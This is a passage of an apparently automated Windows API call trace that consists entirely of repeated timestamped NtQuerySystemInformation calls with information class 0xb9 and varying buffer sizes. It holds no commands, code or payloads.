Length=0x0, ResultLength=0x0) [0289.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217da10, Length=0x20, ResultLength=0x0) [0289.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d910, Length=0x50, ResultLength=0x0) [0289.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d910, Length=0x50, ResultLength=0x0) [0289.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d910, Length=0x50, ResultLength=0x0) [0289.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d800, Length=0x50, ResultLength=0x0) [0289.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d800, Length=0x50, ResultLength=0x0) [0289.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d800, Length=0x50, ResultLength=0x0) [0289.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d800, Length=0x50, ResultLength=0x0) [0289.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d730, Length=0x38, ResultLength=0x0) [0289.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d560, Length=0x28, ResultLength=0x0) [0289.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d560, Length=0x28, ResultLength=0x0) [0289.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d560, Length=0x28, ResultLength=0x0) [0289.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d560, Length=0x28, ResultLength=0x0) [0289.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d5d0, Length=0x28, ResultLength=0x0) [0289.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d730, Length=0x38, ResultLength=0x0) [0289.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d650, Length=0x28, ResultLength=0x0) [0289.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d650, Length=0x28, ResultLength=0x0) [0289.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d4f0, Length=0x20, ResultLength=0x0) [0289.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d470, Length=0x20, ResultLength=0x0) [0289.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d470, Length=0x20, ResultLength=0x0) [0289.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d470, Length=0x20, ResultLength=0x0) [0289.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d730, Length=0x38, ResultLength=0x0) [0289.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d730, Length=0x38, ResultLength=0x0) [0289.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d5b0, Length=0x20, ResultLength=0x0) [0289.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d540, Length=0x20, ResultLength=0x0) [0289.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d540, Length=0x20, ResultLength=0x0) [0289.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d910, Length=0x50, ResultLength=0x0) [0289.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d910, Length=0x50, ResultLength=0x0) [0289.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d910, Length=0x50, ResultLength=0x0) [0289.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d800, Length=0x50, ResultLength=0x0) [0289.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d800, Length=0x50, ResultLength=0x0) [0289.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d800, Length=0x50, ResultLength=0x0) [0289.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d800, Length=0x50, ResultLength=0x0) [0289.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d730, Length=0x38, ResultLength=0x0) [0289.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d560, Length=0x28, ResultLength=0x0) [0289.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d560, Length=0x28, ResultLength=0x0) [0289.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d560, Length=0x28, ResultLength=0x0) [0289.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d560, Length=0x28, ResultLength=0x0) [0289.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d5d0, Length=0x28, ResultLength=0x0) [0289.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d730, Length=0x38, ResultLength=0x0) [0289.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d650, Length=0x28, ResultLength=0x0) [0290.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d650, Length=0x28, ResultLength=0x0) [0290.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d4f0, Length=0x20, ResultLength=0x0) [0290.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d470, Length=0x20, ResultLength=0x0) [0290.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d470, Length=0x20, ResultLength=0x0) [0290.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d470, Length=0x20, ResultLength=0x0) [0290.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d730, Length=0x38, ResultLength=0x0) [0290.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d730, Length=0x38, ResultLength=0x0) [0290.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d5b0, Length=0x20, ResultLength=0x0) [0290.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d540, Length=0x20, ResultLength=0x0) [0290.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217d540, Length=0x20, ResultLength=0x0) [0290.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ded0, Length=0x28, ResultLength=0x0) [0290.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217de18, Length=0x28, ResultLength=0x0) [0290.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217de18, Length=0x28, ResultLength=0x0) [0290.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217de18, Length=0x28, ResultLength=0x0) [0290.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217de18, Length=0x28, ResultLength=0x0) [0290.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217de18, Length=0x28, ResultLength=0x0) [0290.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217de18, Length=0x28, ResultLength=0x0) [0290.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217de18, Length=0x28, ResultLength=0x0) [0290.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dd80, Length=0x20, ResultLength=0x0) [0290.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dd80, Length=0x20, ResultLength=0x0) [0290.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217de18, Length=0x28, ResultLength=0x0) [0290.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dd90, Length=0x40, ResultLength=0x0) [0290.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dd90, Length=0x40, ResultLength=0x0) [0290.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc40, Length=0x20, ResultLength=0x0) [0290.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc40, Length=0x20, ResultLength=0x0) [0290.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dd90, Length=0x40, ResultLength=0x0) [0290.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dd90, Length=0x40, ResultLength=0x0) [0290.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dd90, Length=0x40, ResultLength=0x0) [0290.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dcf0, Length=0x20, ResultLength=0x0) [0290.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dcf0, Length=0x20, ResultLength=0x0) [0290.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dcf0, Length=0x20, ResultLength=0x0) [0290.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dd90, Length=0x40, ResultLength=0x0) [0290.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dd20, Length=0x20, ResultLength=0x0) [0290.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dcc0, Length=0x20, ResultLength=0x0) [0290.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dcc0, Length=0x20, ResultLength=0x0) [0290.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dd90, Length=0x40, ResultLength=0x0) [0290.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dd90, Length=0x40, ResultLength=0x0) [0290.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dd90, Length=0x40, ResultLength=0x0) [0290.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dd90, Length=0x40, ResultLength=0x0) [0290.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc68, Length=0x48, ResultLength=0x0) [0290.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc68, Length=0x48, ResultLength=0x0) [0290.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc68, Length=0x48, ResultLength=0x0) [0290.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc68, Length=0x48, ResultLength=0x0) [0290.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dba0, Length=0x28, ResultLength=0x0) [0290.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dba0, Length=0x28, ResultLength=0x0) [0290.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc68, Length=0x48, ResultLength=0x0) [0290.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc68, Length=0x48, ResultLength=0x0) [0290.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc68, Length=0x48, ResultLength=0x0) [0290.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dba0, Length=0x28, ResultLength=0x0) [0290.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dba0, Length=0x28, ResultLength=0x0) [0290.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc68, Length=0x48, ResultLength=0x0) [0290.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc68, Length=0x48, ResultLength=0x0) [0290.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc68, Length=0x48, ResultLength=0x0) [0290.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dba0, Length=0x28, ResultLength=0x0) [0290.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dba0, Length=0x28, ResultLength=0x0) [0290.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc68, Length=0x48, ResultLength=0x0) [0290.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc68, Length=0x48, ResultLength=0x0) [0290.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dc68, Length=0x48, ResultLength=0x0) [0290.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dba0, Length=0x28, ResultLength=0x0) [0290.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217dba0, Length=0x28, ResultLength=0x0) [0290.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 